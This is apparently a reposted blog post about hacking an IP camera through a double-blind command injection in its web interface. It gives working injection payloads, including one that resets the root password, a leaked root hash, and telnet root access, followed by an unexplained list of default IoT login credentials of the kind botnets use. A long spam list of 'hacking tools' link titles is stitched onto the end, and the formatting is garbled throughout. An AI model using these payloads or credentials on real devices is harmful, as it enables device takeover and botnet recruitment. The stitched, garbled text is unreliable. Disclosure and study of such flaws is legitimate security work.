How I Hacked My IP Camera, And Found This Backdoor Account
Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.
The obvious problems
PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 81/tcp open http GoAhead-Webs httpd | http-auth: | HTTP/1.1 401 Unauthorized |_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open tcpwrapped
The double-blind command injection
$(ping%20-c%202%20%60pwd%60)or cleaning up after URL decode:
$(ping -c 2 `pwd`)but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b) ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`) ;leak it via DNSAfter I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...
I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.
But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)Now, logging in via telnet
(none) login: root Password: BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #Woot woot :) I quickly noticed the root of the command injection problem:
# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
My hardening list
sleep 15 echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
My TODO list
- Investigate the script /system/system/bin/gmail_thread
- Investigate the cloud protocol * - see update 2016 10 27
- Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
root (none)
admin password
root root
root 12345
user user
admin (none)
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/
More info
- Underground Hacker Sites
- Hack Rom Tools
- Hacker Tools For Pc
- Tools For Hacker
- Hack Tools For Ubuntu
- Hacking Tools Mac
- Pentest Box Tools Download
- Pentest Tools For Mac
- Hacker Tool Kit
- Hacking Tools For Windows Free Download
- Pentest Tools For Ubuntu
- Hack Apps
- Physical Pentest Tools
- Tools For Hacker
- Hack Tools Pc
- Hacker Search Tools
- Hacking Tools Free Download
- Hack Tools For Pc
- World No 1 Hacker Software
- Hacker Tools Software
- Underground Hacker Sites
- Hacker Tools Software
- Kik Hack Tools
- Top Pentest Tools
- Hacker Tools Apk Download
- Best Hacking Tools 2019
- Hacker Tool Kit
- Wifi Hacker Tools For Windows
- Pentest Tools Download
- Hack Tools
- Pentest Tools Linux
- Pentest Tools
- Pentest Tools Review
- Hacker Tools Apk Download
- Hacking Tools For Beginners
- Hacker Tools For Ios
- Pentest Tools For Android
- New Hacker Tools
- Tools 4 Hack
- Best Pentesting Tools 2018
- New Hack Tools
- Hackrf Tools
- Nsa Hacker Tools
- Hacking Tools Usb
- Hacking Tools For Windows
- Pentest Reporting Tools
- How To Hack
- Hacker Tools Github
- Hacker Tools Free Download
- Pentest Tools Online
- Hacking Tools Mac
- Hacking Tools Free Download
- Android Hack Tools Github
- Hacker Tools Apk
- Hacking App
- Pentest Tools Find Subdomains
- How To Make Hacking Tools
- Hack Tools Mac
- What Are Hacking Tools
- Pentest Tools Bluekeep
- Usb Pentest Tools
- Pentest Tools Framework
- Hacker Tools Apk
- Physical Pentest Tools
- Pentest Tools Open Source
- Hacking Tools Online
- Hacker Tools Online
- Hacking Tools Download
- Pentest Tools Port Scanner
- Pentest Tools Tcp Port Scanner
- Ethical Hacker Tools
- Hack Tools Mac
- Hacker Tools Apk
- Hacker Tools Apk
- Beginner Hacker Tools
- Hack App
- Best Hacking Tools 2020
- Hacking Tools And Software
- Hacking Tools Usb
- Hacking Tools Online
- Hacking Tools For Beginners
- Install Pentest Tools Ubuntu
- Hack Tool Apk
- Free Pentest Tools For Windows
- Hack Tools For Ubuntu
- Hack Website Online Tool
- Hacker Tools For Mac
- Hackers Toolbox
- Nsa Hacker Tools
- Hacker Tools Hardware
- Hacking Tools For Windows
- Pentest Reporting Tools
- Pentest Tools Download
- Pentest Tools Kali Linux
- Hack App
- Hackers Toolbox
- Wifi Hacker Tools For Windows
- Pentest Tools For Android
- Install Pentest Tools Ubuntu
- Underground Hacker Sites
- Hacking Tools For Windows
- Hacking Tools Windows
- Hacker Tools For Windows
- Hacker Tools Apk
- Hacking Tools For Beginners
- Kik Hack Tools
- Hacking Tools Download
- Hacking Tools For Beginners
- Pentest Tools Bluekeep